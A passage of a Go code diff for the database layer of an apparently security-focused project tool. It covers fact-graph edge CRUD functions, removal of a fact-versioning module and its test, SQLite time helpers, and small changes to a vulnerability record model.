|
return scanProjectFactEdges(rows)
|
||||||
|
}
|
||||||
|
|
||||||
|
// ListOutgoingProjectFactEdges 列出某事实的全部出边。
|
||||||
|
func (db *DB) ListOutgoingProjectFactEdges(projectID, sourceFactKey string) ([]*ProjectFactEdge, error) {
|
||||||
|
rows, err := db.Query(
|
||||||
|
`SELECT id, project_id, source_fact_key, target_fact_key, edge_type, confidence,
|
||||||
|
COALESCE(source_conversation_id,''), created_at, updated_at
|
||||||
|
FROM project_fact_edges
|
||||||
|
WHERE project_id = ? AND source_fact_key = ?
|
||||||
|
ORDER BY created_at ASC, rowid ASC`,
|
||||||
|
projectID, sourceFactKey,
|
||||||
|
)
|
||||||
|
if err != nil {
|
||||||
|
return nil, err
|
||||||
|
}
|
||||||
|
defer rows.Close()
|
||||||
|
return scanProjectFactEdges(rows)
|
||||||
|
}
|
||||||
|
|
||||||
|
// ListIncomingProjectFactEdges 列出某事实的全部入边。
|
||||||
|
func (db *DB) ListIncomingProjectFactEdges(projectID, targetFactKey string) ([]*ProjectFactEdge, error) {
|
||||||
|
rows, err := db.Query(
|
||||||
|
`SELECT id, project_id, source_fact_key, target_fact_key, edge_type, confidence,
|
||||||
|
COALESCE(source_conversation_id,''), created_at, updated_at
|
||||||
|
FROM project_fact_edges
|
||||||
|
WHERE project_id = ? AND target_fact_key = ?
|
||||||
|
ORDER BY created_at ASC, rowid ASC`,
|
||||||
|
projectID, targetFactKey,
|
||||||
|
)
|
||||||
|
if err != nil {
|
||||||
|
return nil, err
|
||||||
|
}
|
||||||
|
defer rows.Close()
|
||||||
|
return scanProjectFactEdges(rows)
|
||||||
|
}
|
||||||
|
|
||||||
|
// ReplaceOutgoingProjectFactEdges 替换某事实的全部出边(links 省略时不调用)。
|
||||||
|
func (db *DB) ReplaceOutgoingProjectFactEdges(projectID, sourceFactKey, sourceConversationID string, inputs []ProjectFactEdgeInput) error {
|
||||||
|
sourceFactKey = strings.TrimSpace(sourceFactKey)
|
||||||
|
if sourceFactKey == "" {
|
||||||
|
return fmt.Errorf("source_fact_key 不能为空")
|
||||||
|
}
|
||||||
|
if _, err := db.Exec(
|
||||||
|
`DELETE FROM project_fact_edges WHERE project_id = ? AND source_fact_key = ?`,
|
||||||
|
projectID, sourceFactKey,
|
||||||
|
); err != nil {
|
||||||
|
return fmt.Errorf("清除旧边失败: %w", err)
|
||||||
|
}
|
||||||
|
for _, in := range inputs {
|
||||||
|
target := strings.TrimSpace(in.To)
|
||||||
|
if target == "" {
|
||||||
|
continue
|
||||||
|
}
|
||||||
|
if err := ValidateFactKey(target); err != nil {
|
||||||
|
return fmt.Errorf("target fact_key 无效 (%s): %w", target, err)
|
||||||
|
}
|
||||||
|
if target == sourceFactKey {
|
||||||
|
return fmt.Errorf("边不能指向自身: %s", sourceFactKey)
|
||||||
|
}
|
||||||
|
if err := ValidateProjectFactEdgeType(in.Type); err != nil {
|
||||||
|
return err
|
||||||
|
}
|
||||||
|
edge := &ProjectFactEdge{
|
||||||
|
ID: uuid.New().String(),
|
||||||
|
ProjectID: projectID,
|
||||||
|
SourceFactKey: sourceFactKey,
|
||||||
|
TargetFactKey: target,
|
||||||
|
EdgeType: strings.ToLower(strings.TrimSpace(in.Type)),
|
||||||
|
Confidence: normalizeEdgeConfidence(in.Confidence),
|
||||||
|
SourceConversationID: sourceConversationID,
|
||||||
|
CreatedAt: time.Now(),
|
||||||
|
UpdatedAt: time.Now(),
|
||||||
|
}
|
||||||
|
if err := db.insertProjectFactEdge(edge); err != nil {
|
||||||
|
return err
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return nil
|
||||||
|
}
|
||||||
|
|
||||||
|
// ReplaceIncomingProjectFactEdges 替换某事实的全部入边(From 为来源 fact_key)。
|
||||||
|
func (db *DB) ReplaceIncomingProjectFactEdges(projectID, targetFactKey string, inputs []ProjectFactEdgeFromInput) error {
|
||||||
|
targetFactKey = strings.TrimSpace(targetFactKey)
|
||||||
|
if targetFactKey == "" {
|
||||||
|
return fmt.Errorf("target_fact_key 不能为空")
|
||||||
|
}
|
||||||
|
if _, err := db.Exec(
|
||||||
|
`DELETE FROM project_fact_edges WHERE project_id = ? AND target_fact_key = ?`,
|
||||||
|
projectID, targetFactKey,
|
||||||
|
); err != nil {
|
||||||
|
return fmt.Errorf("清除旧入边失败: %w", err)
|
||||||
|
}
|
||||||
|
for _, in := range inputs {
|
||||||
|
source := strings.TrimSpace(in.From)
|
||||||
|
if source == "" {
|
||||||
|
continue
|
||||||
|
}
|
||||||
|
if err := ValidateFactKey(source); err != nil {
|
||||||
|
return fmt.Errorf("source fact_key 无效 (%s): %w", source, err)
|
||||||
|
}
|
||||||
|
if source == targetFactKey {
|
||||||
|
return fmt.Errorf("边不能指向自身: %s", targetFactKey)
|
||||||
|
}
|
||||||
|
if err := ValidateProjectFactEdgeType(in.Type); err != nil {
|
||||||
|
return err
|
||||||
|
}
|
||||||
|
sourceConversationID := ""
|
||||||
|
if srcFact, err := db.GetProjectFactByKey(projectID, source); err == nil && srcFact != nil {
|
||||||
|
sourceConversationID = srcFact.SourceConversationID
|
||||||
|
}
|
||||||
|
edge := &ProjectFactEdge{
|
||||||
|
ID: uuid.New().String(),
|
||||||
|
ProjectID: projectID,
|
||||||
|
SourceFactKey: source,
|
||||||
|
TargetFactKey: targetFactKey,
|
||||||
|
EdgeType: strings.ToLower(strings.TrimSpace(in.Type)),
|
||||||
|
Confidence: normalizeEdgeConfidence(in.Confidence),
|
||||||
|
SourceConversationID: sourceConversationID,
|
||||||
|
CreatedAt: time.Now(),
|
||||||
|
UpdatedAt: time.Now(),
|
||||||
|
}
|
||||||
|
if err := db.insertProjectFactEdge(edge); err != nil {
|
||||||
|
return err
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return nil
|
||||||
|
}
|
||||||
|
|
||||||
|
// GetProjectFactEdge 按 ID 获取边。
|
||||||
|
func (db *DB) GetProjectFactEdge(edgeID string) (*ProjectFactEdge, error) {
|
||||||
|
var e ProjectFactEdge
|
||||||
|
var createdAt, updatedAt string
|
||||||
|
err := db.QueryRow(
|
||||||
|
`SELECT id, project_id, source_fact_key, target_fact_key, edge_type, confidence,
|
||||||
|
COALESCE(source_conversation_id,''), created_at, updated_at
|
||||||
|
FROM project_fact_edges WHERE id = ?`, edgeID,
|
||||||
|
).Scan(&e.ID, &e.ProjectID, &e.SourceFactKey, &e.TargetFactKey, &e.EdgeType, &e.Confidence,
|
||||||
|
&e.SourceConversationID, &createdAt, &updatedAt)
|
||||||
|
if err != nil {
|
||||||
|
return nil, fmt.Errorf("边不存在")
|
||||||
|
}
|
||||||
|
e.CreatedAt = parseDBTime(createdAt)
|
||||||
|
e.UpdatedAt = parseDBTime(updatedAt)
|
||||||
|
return &e, nil
|
||||||
|
}
|
||||||
|
|
||||||
|
// AddProjectFactEdge 新增单条边(已存在则更新 confidence)。
|
||||||
|
func (db *DB) AddProjectFactEdge(projectID string, in ProjectFactEdgeInput, sourceFactKey, sourceConversationID string) (*ProjectFactEdge, error) {
|
||||||
|
sourceFactKey = strings.TrimSpace(sourceFactKey)
|
||||||
|
target := strings.TrimSpace(in.To)
|
||||||
|
if sourceFactKey == "" || target == "" {
|
||||||
|
return nil, fmt.Errorf("source 与 target 必填")
|
||||||
|
}
|
||||||
|
if sourceFactKey == target {
|
||||||
|
return nil, fmt.Errorf("边不能指向自身")
|
||||||
|
}
|
||||||
|
if err := ValidateProjectFactEdgeType(in.Type); err != nil {
|
||||||
|
return nil, err
|
||||||
|
}
|
||||||
|
if err := ValidateFactKey(target); err != nil {
|
||||||
|
return nil, err
|
||||||
|
}
|
||||||
|
now := time.Now()
|
||||||
|
e := &ProjectFactEdge{
|
||||||
|
ID: uuid.New().String(),
|
||||||
|
ProjectID: projectID,
|
||||||
|
SourceFactKey: sourceFactKey,
|
||||||
|
TargetFactKey: target,
|
||||||
|
EdgeType: strings.ToLower(strings.TrimSpace(in.Type)),
|
||||||
|
Confidence: normalizeEdgeConfidence(in.Confidence),
|
||||||
|
SourceConversationID: sourceConversationID,
|
||||||
|
CreatedAt: now,
|
||||||
|
UpdatedAt: now,
|
||||||
|
}
|
||||||
|
_, err := db.Exec(
|
||||||
|
`INSERT INTO project_fact_edges (
|
||||||
|
id, project_id, source_fact_key, target_fact_key, edge_type, confidence,
|
||||||
|
source_conversation_id, created_at, updated_at
|
||||||
|
) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?)
|
||||||
|
ON CONFLICT(project_id, source_fact_key, target_fact_key, edge_type)
|
||||||
|
DO UPDATE SET confidence = excluded.confidence, updated_at = excluded.updated_at`,
|
||||||
|
e.ID, e.ProjectID, e.SourceFactKey, e.TargetFactKey, e.EdgeType, e.Confidence,
|
||||||
|
nullIfEmpty(e.SourceConversationID), e.CreatedAt, e.UpdatedAt,
|
||||||
|
)
|
||||||
|
if err != nil {
|
||||||
|
return nil, fmt.Errorf("添加边失败: %w", err)
|
||||||
|
}
|
||||||
|
// 返回最新
|
||||||
|
rows, err := db.Query(
|
||||||
|
`SELECT id, project_id, source_fact_key, target_fact_key, edge_type, confidence,
|
||||||
|
COALESCE(source_conversation_id,''), created_at, updated_at
|
||||||
|
FROM project_fact_edges
|
||||||
|
WHERE project_id = ? AND source_fact_key = ? AND target_fact_key = ? AND edge_type = ?`,
|
||||||
|
projectID, sourceFactKey, target, e.EdgeType,
|
||||||
|
)
|
||||||
|
if err != nil {
|
||||||
|
return e, nil
|
||||||
|
}
|
||||||
|
defer rows.Close()
|
||||||
|
list, err := scanProjectFactEdges(rows)
|
||||||
|
if err != nil || len(list) == 0 {
|
||||||
|
return e, nil
|
||||||
|
}
|
||||||
|
return list[0], nil
|
||||||
|
}
|
||||||
|
|
||||||
|
// DeleteProjectFactEdge 删除单条边。
|
||||||
|
func (db *DB) DeleteProjectFactEdge(edgeID string) error {
|
||||||
|
res, err := db.Exec(`DELETE FROM project_fact_edges WHERE id = ?`, edgeID)
|
||||||
|
if err != nil {
|
||||||
|
return err
|
||||||
|
}
|
||||||
|
n, _ := res.RowsAffected()
|
||||||
|
if n == 0 {
|
||||||
|
return fmt.Errorf("边不存在")
|
||||||
|
}
|
||||||
|
return nil
|
||||||
|
}
|
||||||
|
|
||||||
|
func (db *DB) insertProjectFactEdge(e *ProjectFactEdge) error {
|
||||||
|
_, err := db.Exec(
|
||||||
|
`INSERT INTO project_fact_edges (
|
||||||
|
id, project_id, source_fact_key, target_fact_key, edge_type, confidence,
|
||||||
|
source_conversation_id, created_at, updated_at
|
||||||
|
) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?)`,
|
||||||
|
e.ID, e.ProjectID, e.SourceFactKey, e.TargetFactKey, e.EdgeType, e.Confidence,
|
||||||
|
nullIfEmpty(e.SourceConversationID), e.CreatedAt, e.UpdatedAt,
|
||||||
|
)
|
||||||
|
if err != nil {
|
||||||
|
return fmt.Errorf("写入边失败: %w", err)
|
||||||
|
}
|
||||||
|
return nil
|
||||||
|
}
|
||||||
|
|
||||||
|
// RenameProjectFactKeyEdges 事实 key 变更时同步边上的引用。
|
||||||
|
func (db *DB) RenameProjectFactKeyEdges(projectID, oldKey, newKey string) error {
|
||||||
|
oldKey = strings.TrimSpace(oldKey)
|
||||||
|
newKey = strings.TrimSpace(newKey)
|
||||||
|
if oldKey == "" || newKey == "" || oldKey == newKey {
|
||||||
|
return nil
|
||||||
|
}
|
||||||
|
now := time.Now()
|
||||||
|
if _, err := db.Exec(
|
||||||
|
`UPDATE project_fact_edges SET source_fact_key = ?, updated_at = ?
|
||||||
|
WHERE project_id = ? AND source_fact_key = ?`,
|
||||||
|
newKey, now, projectID, oldKey,
|
||||||
|
); err != nil {
|
||||||
|
return err
|
||||||
|
}
|
||||||
|
_, err := db.Exec(
|
||||||
|
`UPDATE project_fact_edges SET target_fact_key = ?, updated_at = ?
|
||||||
|
WHERE project_id = ? AND target_fact_key = ?`,
|
||||||
|
newKey, now, projectID, oldKey,
|
||||||
|
)
|
||||||
|
return err
|
||||||
|
}
|
||||||
|
|
||||||
|
// DeleteProjectFactEdgesForKey 删除与某 fact_key 相关的全部边。
|
||||||
|
func (db *DB) DeleteProjectFactEdgesForKey(projectID, factKey string) error {
|
||||||
|
_, err := db.Exec(
|
||||||
|
`DELETE FROM project_fact_edges
|
||||||
|
WHERE project_id = ? AND (source_fact_key = ? OR target_fact_key = ?)`,
|
||||||
|
projectID, factKey, factKey,
|
||||||
|
)
|
||||||
|
return err
|
||||||
|
}
|
||||||
|
|
||||||
|
// DeprecateProjectFactEdgesForKey 将关联边标记为 deprecated。
|
||||||
|
func (db *DB) DeprecateProjectFactEdgesForKey(projectID, factKey string) error {
|
||||||
|
now := time.Now()
|
||||||
|
_, err := db.Exec(
|
||||||
|
`UPDATE project_fact_edges SET confidence = 'deprecated', updated_at = ?
|
||||||
|
WHERE project_id = ? AND (source_fact_key = ? OR target_fact_key = ?)
|
||||||
|
AND confidence != 'deprecated'`,
|
||||||
|
now, projectID, factKey, factKey,
|
||||||
|
)
|
||||||
|
return err
|
||||||
|
}
|
||||||
|
|
||||||
|
func scanProjectFactEdges(rows *sql.Rows) ([]*ProjectFactEdge, error) {
|
||||||
|
var out []*ProjectFactEdge
|
||||||
|
for rows.Next() {
|
||||||
|
var e ProjectFactEdge
|
||||||
|
var createdAt, updatedAt string
|
||||||
|
if err := rows.Scan(
|
||||||
|
&e.ID, &e.ProjectID, &e.SourceFactKey, &e.TargetFactKey, &e.EdgeType, &e.Confidence,
|
||||||
|
&e.SourceConversationID, &createdAt, &updatedAt,
|
||||||
|
); err != nil {
|
||||||
|
return nil, err
|
||||||
|
}
|
||||||
|
e.CreatedAt = parseDBTime(createdAt)
|
||||||
|
e.UpdatedAt = parseDBTime(updatedAt)
|
||||||
|
out = append(out, &e)
|
||||||
|
}
|
||||||
|
return out, rows.Err()
|
||||||
|
}
|
||||||
@@ -135,54 +135,6 @@ func TestRestoreProjectFact(t *testing.T) {
|
|||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
func TestUpsertProjectFact_createsVersionOnContentChange(t *testing.T) {
|
|
||||||
dbPath := filepath.Join(t.TempDir(), "facts.db")
|
|
||||||
db, err := NewDB(dbPath, zap.NewNop())
|
|
||||||
if err != nil {
|
|
||||||
t.Fatal(err)
|
|
||||||
}
|
|
||||||
defer db.Close()
|
|
||||||
|
|
||||||
proj, err := db.CreateProject(&Project{Name: "version-test"})
|
|
||||||
if err != nil {
|
|
||||||
t.Fatal(err)
|
|
||||||
}
|
|
||||||
|
|
||||||
created, err := db.UpsertProjectFact(&ProjectFact{
|
|
||||||
ProjectID: proj.ID,
|
|
||||||
FactKey: "finding/xss",
|
|
||||||
Category: "finding",
|
|
||||||
Summary: "v1",
|
|
||||||
Body: "body v1",
|
|
||||||
})
|
|
||||||
if err != nil {
|
|
||||||
t.Fatal(err)
|
|
||||||
}
|
|
||||||
if created.SupersedesFactID != "" {
|
|
||||||
t.Fatalf("expected no supersedes on create, got %q", created.SupersedesFactID)
|
|
||||||
}
|
|
||||||
|
|
||||||
updated, err := db.UpsertProjectFact(&ProjectFact{
|
|
||||||
ProjectID: proj.ID,
|
|
||||||
FactKey: "finding/xss",
|
|
||||||
Summary: "v2",
|
|
||||||
Body: "body v2",
|
|
||||||
})
|
|
||||||
if err != nil {
|
|
||||||
t.Fatal(err)
|
|
||||||
}
|
|
||||||
if updated.SupersedesFactID == "" {
|
|
||||||
t.Fatal("expected supersedes_fact_id after content change")
|
|
||||||
}
|
|
||||||
prev, err := db.GetProjectFactVersion(updated.SupersedesFactID)
|
|
||||||
if err != nil {
|
|
||||||
t.Fatal(err)
|
|
||||||
}
|
|
||||||
if prev.Summary != "v1" || prev.Body != "body v1" {
|
|
||||||
t.Fatalf("previous version mismatch: summary=%q body=%q", prev.Summary, prev.Body)
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
func TestMergeFactBodyOnUpdate(t *testing.T) {
|
func TestMergeFactBodyOnUpdate(t *testing.T) {
|
||||||
if got := mergeFactBodyOnUpdate("", "keep"); got != "keep" {
|
if got := mergeFactBodyOnUpdate("", "keep"); got != "keep" {
|
||||||
t.Fatalf("empty incoming: got %q", got)
|
t.Fatalf("empty incoming: got %q", got)
|
||||||
|
|||||||
@@ -1,144 +0,0 @@
|
|||||||
package database
|
|
||||||
|
|
||||||
import (
|
|
||||||
"database/sql"
|
|
||||||
"fmt"
|
|
||||||
"strings"
|
|
||||||
"time"
|
|
||||||
|
|
||||||
"github.com/google/uuid"
|
|
||||||
)
|
|
||||||
|
|
||||||
// ProjectFactVersion 事实历史快照(同 fact_key 更新前归档)。
|
|
||||||
type ProjectFactVersion struct {
|
|
||||||
ID string `json:"id"`
|
|
||||||
FactID string `json:"fact_id"`
|
|
||||||
ProjectID string `json:"project_id"`
|
|
||||||
FactKey string `json:"fact_key"`
|
|
||||||
Category string `json:"category"`
|
|
||||||
Summary string `json:"summary"`
|
|
||||||
Body string `json:"body"`
|
|
||||||
Confidence string `json:"confidence"`
|
|
||||||
SourceConversationID string `json:"source_conversation_id,omitempty"`
|
|
||||||
SourceMessageID string `json:"source_message_id,omitempty"`
|
|
||||||
Pinned bool `json:"pinned"`
|
|
||||||
RelatedVulnerabilityID string `json:"related_vulnerability_id,omitempty"`
|
|
||||||
ArchivedAt time.Time `json:"archived_at"`
|
|
||||||
}
|
|
||||||
|
|
||||||
// InsertProjectFactVersion 将当前事实行快照写入版本表。
|
|
||||||
func (db *DB) InsertProjectFactVersion(f *ProjectFact) (string, error) {
|
|
||||||
if f == nil || f.ID == "" {
|
|
||||||
return "", fmt.Errorf("无效的事实记录")
|
|
||||||
}
|
|
||||||
id := uuid.New().String()
|
|
||||||
now := time.Now()
|
|
||||||
_, err := db.Exec(
|
|
||||||
`INSERT INTO project_fact_versions (
|
|
||||||
id, fact_id, project_id, fact_key, category, summary, body, confidence,
|
|
||||||
source_conversation_id, source_message_id, pinned, related_vulnerability_id, archived_at
|
|
||||||
) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)`,
|
|
||||||
id, f.ID, f.ProjectID, f.FactKey, f.Category, f.Summary, f.Body, f.Confidence,
|
|
||||||
nullIfEmpty(f.SourceConversationID), nullIfEmpty(f.SourceMessageID), boolToInt(f.Pinned),
|
|
||||||
nullIfEmpty(f.RelatedVulnerabilityID), now,
|
|
||||||
)
|
|
||||||
if err != nil {
|
|
||||||
return "", fmt.Errorf("归档事实版本失败: %w", err)
|
|
||||||
}
|
|
||||||
return id, nil
|
|
||||||
}
|
|
||||||
|
|
||||||
// GetProjectFactVersion 按版本 ID 获取快照。
|
|
||||||
func (db *DB) GetProjectFactVersion(versionID string) (*ProjectFactVersion, error) {
|
|
||||||
row := db.QueryRow(
|
|
||||||
`SELECT id, fact_id, project_id, fact_key, category, summary, COALESCE(body,''), confidence,
|
|
||||||
COALESCE(source_conversation_id,''), COALESCE(source_message_id,''), pinned,
|
|
||||||
COALESCE(related_vulnerability_id,''), archived_at
|
|
||||||
FROM project_fact_versions WHERE id = ?`, versionID,
|
|
||||||
)
|
|
||||||
return scanProjectFactVersionRow(row)
|
|
||||||
}
|
|
||||||
|
|
||||||
// ListProjectFactVersions 列出某条事实的全部历史版本(新→旧)。
|
|
||||||
func (db *DB) ListProjectFactVersions(factID string, limit int) ([]*ProjectFactVersion, error) {
|
|
||||||
if limit <= 0 {
|
|
||||||
limit = 20
|
|
||||||
}
|
|
||||||
rows, err := db.Query(
|
|
||||||
`SELECT id, fact_id, project_id, fact_key, category, summary, COALESCE(body,''), confidence,
|
|
||||||
COALESCE(source_conversation_id,''), COALESCE(source_message_id,''), pinned,
|
|
||||||
COALESCE(related_vulnerability_id,''), archived_at
|
|
||||||
FROM project_fact_versions WHERE fact_id = ? ORDER BY archived_at DESC LIMIT ?`,
|
|
||||||
factID, limit,
|
|
||||||
)
|
|
||||||
if err != nil {
|
|
||||||
return nil, err
|
|
||||||
}
|
|
||||||
defer rows.Close()
|
|
||||||
var out []*ProjectFactVersion
|
|
||||||
for rows.Next() {
|
|
||||||
v, err := scanProjectFactVersionFromRows(rows)
|
|
||||||
if err != nil {
|
|
||||||
return nil, err
|
|
||||||
}
|
|
||||||
out = append(out, v)
|
|
||||||
}
|
|
||||||
return out, rows.Err()
|
|
||||||
}
|
|
||||||
|
|
||||||
func projectFactContentChanged(existing, incoming *ProjectFact) bool {
|
|
||||||
if existing == nil || incoming == nil {
|
|
||||||
return false
|
|
||||||
}
|
|
||||||
mergedBody := mergeFactBodyOnUpdate(incoming.Body, existing.Body)
|
|
||||||
inCat := stringsTrimDefault(incoming.Category, existing.Category)
|
|
||||||
inConf := stringsTrimDefault(incoming.Confidence, existing.Confidence)
|
|
||||||
return existing.Summary != incoming.Summary ||
|
|
||||||
existing.Body != mergedBody ||
|
|
||||||
existing.Category != inCat ||
|
|
||||||
existing.Confidence != inConf
|
|
||||||
}
|
|
||||||
|
|
||||||
func stringsTrimDefault(s, fallback string) string {
|
|
||||||
if strings.TrimSpace(s) == "" {
|
|
||||||
return fallback
|
|
||||||
}
|
|
||||||
return strings.TrimSpace(s)
|
|
||||||
}
|
|
||||||
|
|
||||||
func scanProjectFactVersionRow(row *sql.Row) (*ProjectFactVersion, error) {
|
|
||||||
var v ProjectFactVersion
|
|
||||||
var pinned int
|
|
||||||
var archivedAt string
|
|
||||||
err := row.Scan(
|
|
||||||
&v.ID, &v.FactID, &v.ProjectID, &v.FactKey, &v.Category, &v.Summary, &v.Body, &v.Confidence,
|
|
||||||
&v.SourceConversationID, &v.SourceMessageID, &pinned,
|
|
||||||
&v.RelatedVulnerabilityID, &archivedAt,
|
|
||||||
)
|
|
||||||
if err != nil {
|
|
||||||
if err == sql.ErrNoRows {
|
|
||||||
return nil, fmt.Errorf("事实版本不存在")
|
|
||||||
}
|
|
||||||
return nil, err
|
|
||||||
}
|
|
||||||
v.Pinned = pinned != 0
|
|
||||||
v.ArchivedAt = parseDBTime(archivedAt)
|
|
||||||
return &v, nil
|
|
||||||
}
|
|
||||||
|
|
||||||
func scanProjectFactVersionFromRows(rows *sql.Rows) (*ProjectFactVersion, error) {
|
|
||||||
var v ProjectFactVersion
|
|
||||||
var pinned int
|
|
||||||
var archivedAt string
|
|
||||||
err := rows.Scan(
|
|
||||||
&v.ID, &v.FactID, &v.ProjectID, &v.FactKey, &v.Category, &v.Summary, &v.Body, &v.Confidence,
|
|
||||||
&v.SourceConversationID, &v.SourceMessageID, &pinned,
|
|
||||||
&v.RelatedVulnerabilityID, &archivedAt,
|
|
||||||
)
|
|
||||||
if err != nil {
|
|
||||||
return nil, err
|
|
||||||
}
|
|
||||||
v.Pinned = pinned != 0
|
|
||||||
v.ArchivedAt = parseDBTime(archivedAt)
|
|
||||||
return &v, nil
|
|
||||||
}
|
|
||||||
@@ -37,7 +37,7 @@ func TestListProjectFacts_updatedAtJSON(t *testing.T) {
|
|||||||
if err != nil {
|
if err != nil {
|
||||||
t.Fatal(err)
|
t.Fatal(err)
|
||||||
}
|
}
|
||||||
projects, err := db.ListProjects("", 1, 0)
|
projects, err := db.ListProjects("", "", 1, 0)
|
||||||
if err != nil || len(projects) == 0 {
|
if err != nil || len(projects) == 0 {
|
||||||
t.Skip("no projects")
|
t.Skip("no projects")
|
||||||
}
|
}
|
||||||
|
|||||||
@@ -0,0 +1,33 @@
|
|||||||
|
package database
|
||||||
|
|
||||||
|
import (
|
||||||
|
"errors"
|
||||||
|
"strings"
|
||||||
|
"time"
|
||||||
|
)
|
||||||
|
|
||||||
|
// formatSQLiteUTC stores instants as UTC RFC3339 for consistent SQLite reads/writes.
|
||||||
|
func formatSQLiteUTC(t time.Time) string {
|
||||||
|
return t.UTC().Format(time.RFC3339Nano)
|
||||||
|
}
|
||||||
|
|
||||||
|
// sqliteEpochGE returns SQL comparing column to param as Unix seconds (timezone-safe).
|
||||||
|
func sqliteEpochGE(column, op string) string {
|
||||||
|
return "strftime('%s', " + column + ") " + op + " strftime('%s', ?)"
|
||||||
|
}
|
||||||
|
|
||||||
|
// ParseRFC3339Time parses API/query timestamps (RFC3339 or RFC3339Nano).
|
||||||
|
func ParseRFC3339Time(value string) (time.Time, error) {
|
||||||
|
value = strings.TrimSpace(value)
|
||||||
|
if value == "" {
|
||||||
|
return time.Time{}, errors.New("empty time value")
|
||||||
|
}
|
||||||
|
if t, err := time.Parse(time.RFC3339Nano, value); err == nil {
|
||||||
|
return t.UTC(), nil
|
||||||
|
}
|
||||||
|
t, err := time.Parse(time.RFC3339, value)
|
||||||
|
if err != nil {
|
||||||
|
return time.Time{}, err
|
||||||
|
}
|
||||||
|
return t.UTC(), nil
|
||||||
|
}
|
||||||
@@ -98,7 +98,7 @@ type Vulnerability struct {
|
|||||||
Title string `json:"title"`
|
Title string `json:"title"`
|
||||||
Description string `json:"description"`
|
Description string `json:"description"`
|
||||||
Severity string `json:"severity"` // critical, high, medium, low, info
|
Severity string `json:"severity"` // critical, high, medium, low, info
|
||||||
Status string `json:"status"` // open, confirmed, fixed, false_positive
|
Status string `json:"status"` // open, confirmed, fixed, false_positive, ignored
|
||||||
Type string `json:"type"`
|
Type string `json:"type"`
|
||||||
Target string `json:"target"`
|
Target string `json:"target"`
|
||||||
Proof string `json:"proof"`
|
Proof string `json:"proof"`
|
||||||
@@ -138,7 +138,7 @@ func (db *DB) CreateVulnerability(vuln *Vulnerability) (*Vulnerability, error) {
|
|||||||
|
|
||||||
_, err := db.Exec(
|
_, err := db.Exec(
|
||||||
query,
|
query,
|
||||||
vuln.ID, vuln.ConversationID, nullIfEmpty(vuln.ProjectID), vuln.ConversationTag, vuln.TaskTag, vuln.Title, vuln.Description,
|
vuln.ID, nullIfEmpty(vuln.ConversationID), nullIfEmpty(vuln.ProjectID), vuln.ConversationTag, vuln.TaskTag, vuln.Title, vuln.Description,
|
||||||
vuln.Severity, vuln.Status, vuln.Type, vuln.Target,
|
vuln.Severity, vuln.Status, vuln.Type, vuln.Target,
|
||||||
vuln.Proof, vuln.Impact, vuln.Recommendation,
|
vuln.Proof, vuln.Impact, vuln.Recommendation,
|
||||||
vuln.CreatedAt, vuln.UpdatedAt,
|
vuln.CreatedAt, vuln.UpdatedAt,
|
||||||
@@ -154,7 +154,7 @@ func (db *DB) CreateVulnerability(vuln *Vulnerability) (*Vulnerability, error) {
|
|||||||
func (db *DB) GetVulnerability(id string) (*Vulnerability, error) {
|
func (db *DB) GetVulnerability(id string) (*Vulnerability, error) {
|
||||||
var vuln Vulnerability
|
var vuln Vulnerability
|
||||||
query := `
|
query := `
|
||||||
SELECT id, conversation_id, COALESCE(project_id,''), title, description, severity, status,
|
SELECT id, COALESCE(conversation_id,''), COALESCE(project_id,''), title, description, severity, status,
|
||||||
conversation_tag, task_tag, vulnerability_type, target, proof, impact, recommendation,
|
conversation_tag, task_tag, vulnerability_type, target, proof, impact, recommendation,
|
||||||
COALESCE((SELECT bt.id FROM batch_tasks bt WHERE bt.conversation_id = vulnerabilities.conversation_id LIMIT 1), '') AS task_id,
|
COALESCE((SELECT bt.id FROM batch_tasks bt WHERE bt.conversation_id = vulnerabilities.conversation_id LIMIT 1), '') AS task_id,
|
||||||
COALESCE((SELECT bt.queue_id FROM batch_tasks bt WHERE bt.conversation_id = vulnerabilities.conversation_id LIMIT 1), '') AS task_queue_id,
|
COALESCE((SELECT bt.queue_id FROM batch_tasks bt WHERE bt.conversation_id = vulnerabilities.conversation_id LIMIT 1), '') AS task_queue_id,
|
||||||
@@ -183,7 +183,7 @@ func (db *DB) GetVulnerability(id string) (*Vulnerability, error) {
|
|||||||
// ListVulnerabilities 列出漏洞
|
// ListVulnerabilities 列出漏洞
|
||||||
func (db *DB) ListVulnerabilities(limit, offset int, filter VulnerabilityListFilter) ([]*Vulnerability, error) {
|
func (db *DB) ListVulnerabilities(limit, offset int, filter VulnerabilityListFilter) ([]*Vulnerability, error) {
|
||||||
query := `
|
query := `
|
||||||
SELECT id, conversation_id, COALESCE(project_id,''), title, description, severity, status, conversation_tag, task_tag,
|
SELECT id, COALESCE(conversation_id,''), COALESCE(project_id,''), title, description, severity, status, conversation_tag, task_tag,
|
||||||
vulnerability_type, target, proof, impact, recommendation,
|
vulnerability_type, target, proof, impact, recommendation,
|
||||||
COALESCE((SELECT bt.id FROM batch_tasks bt WHERE bt.conversation_id = vulnerabilities.conversation_id LIMIT 1), '') AS task_id,
|
COALESCE((SELECT bt.id FROM batch_tasks bt WHERE bt.conversation_id = vulnerabilities.conversation_id LIMIT 1), '') AS task_id,
|
||||||
COALESCE((SELECT bt.queue_id FROM batch_tasks bt WHERE bt.conversation_id = vulnerabilities.conversation_id LIMIT 1), '') AS task_queue_id,
|
COALESCE((SELECT bt.queue_id FROM batch_tasks bt WHERE bt.conversation_id = vulnerabilities.conversation_id LIMIT 1), '') AS task_queue_id,
|
||||||
@@ -263,6 +263,39 @@ func (db *DB) UpdateVulnerability(id string, vuln *Vulnerability) error {
|
|||||||
return nil
|
return nil
|
||||||
}
|
}
|
||||||
|
|
||||||
|
// DeleteVulnerabilitiesByFilter 按筛选条件批量删除漏洞,返回实际删除条数
|
||||||
|
func (db *DB) DeleteVulnerabilitiesByFilter(filter VulnerabilityListFilter) (int64, error) {
|
||||||
|
tx, err := db.Begin()
|
||||||
|
if err != nil {
|
||||||
|
return 0, fmt.Errorf("开启事务失败: %w", err)
|
||||||
|
}
|
||||||
|
defer func() { _ = tx.Rollback() }()
|
||||||
|
|
||||||
|
where := "WHERE 1=1"
|
||||||
|
args := []interface{}{}
|
||||||
|
where, args = filter.appendWhere(where, args)
|
||||||
|
|
||||||
|
